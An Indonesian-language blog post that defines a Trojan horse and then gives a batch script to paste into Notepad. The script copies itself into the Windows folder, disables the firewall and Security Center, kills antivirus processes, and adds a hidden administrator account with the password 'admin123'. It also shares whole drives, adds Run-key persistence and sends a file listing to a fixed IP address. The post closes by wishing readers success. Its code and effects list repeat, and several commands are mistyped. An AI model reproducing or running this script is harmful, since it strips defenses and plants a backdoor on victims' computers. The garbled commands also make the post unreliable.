Trojan horse atau Kuda Troya atau yang lebih dikenal
sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat
lunak yang mencurigakan yang dapat merusak sebuah sistem atau jaringan.Tujuan
dari Trojan adalah memperoleh informasi dari target dan mengendalikan target
untuk memperoleh hak akses pada target. Trojan bersifat "stealth"
atau siluman dan tidak terlihat dalam operasinya dan seringkali berbentuk
seolah-olah program tersebut merupakan program baik-baik. Penggunaan istilah
Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan
dan merusak di dalam sebuah program baik-baik dan berguna. Kebanyakan Trojan
saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM) dalam
sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi
dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain yang dimasukkan ke
dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting
bagi pengguna misalnya: password , data kartu kredit , dan lain- lain.
Gak usah panjang lebar deh, langsung aja buka notepad
lalau copas code berikut :
@echo off
color 0a
cls
IF not exist %windir%\%0 copy %0 %windir%
netsh firewall set opmode=disable
net stop ShareAccess
Net stop “Security Center”
Tskill *AV*
NET USER admin admin123 /ADD
NET LOCAL GROUP ADMINISTRATORS admin /ADD
Reg ADD “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ SpecialAccounts \UserList” /v”admin” /t REG_DWORD/d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\Messenger /v Start /t REG_DWORD /d 2/f
Net start messenger
dir *.*>>Filelist.txt
Net send 192.168.1.100 >hasil.txt
NET SHARE system=%SYSTEMDRIVE% /UNLIMITED
NET SHARE data1=D:\ /UNLIMITED
NET SHARE data1=E:\ /UNLIMITED
REG ADD HKCR\Network\SharingHandler /ve /t REG_SZ/d “”/f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v forceguest /t REG_DWORD /d 0 /f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v restrictanonymous /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\TIntSvr /v Start /t REG_DWORD /d 2/f
Net start tIntsvr
REG ADD HKLM\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f
REG ADD HKCU\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f
efek diantaranya adalah :
@echo off
color 0a
cls
IF not exist %windir%\%0 copy %0 %windir%
netsh firewall set opmode=disable
net stop ShareAccess
Net stop “Security Center”
Tskill *AV*
NET USER admin admin123 /ADD
NET LOCAL GROUP ADMINISTRATORS admin /ADD
Reg ADD “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ SpecialAccounts \UserList” /v”admin” /t REG_DWORD/d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\Messenger /v Start /t REG_DWORD /d 2/f
Net start messenger
dir *.*>>Filelist.txt
Net send 192.168.1.100 >hasil.txt
NET SHARE system=%SYSTEMDRIVE% /UNLIMITED
NET SHARE data1=D:\ /UNLIMITED
NET SHARE data1=E:\ /UNLIMITED
REG ADD HKCR\Network\SharingHandler /ve /t REG_SZ/d “”/f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v forceguest /t REG_DWORD /d 0 /f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v restrictanonymous /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\TIntSvr /v Start /t REG_DWORD /d 2/f
Net start tIntsvr
REG ADD HKLM\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f
REG ADD HKCU\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f
efek diantaranya adalah :
efek diantaranya adalah :
-penyebaran seperti worm jadi mudah berkembang biak
-disable firewall
-stop ShareAccess
-stop Security Center
-nge kill AV
-membuat user dengan nama admin123
-pertahanan pada user admin123
-menjalankan messenger
-mengirim kan hasil rekaman ke ip 192.168.1.100
Selamat mencoba, semoga berhasil...........
-penyebaran seperti worm jadi mudah berkembang biak
-disable firewall
-stop ShareAccess
-stop Security Center
-nge kill AV
-membuat user dengan nama admin123
-pertahanan pada user admin123
-menjalankan messenger
-mengirim kan hasil rekaman ke ip 192.168.1.100
Selamat mencoba, semoga berhasil...........
Tidak ada komentar:
Posting Komentar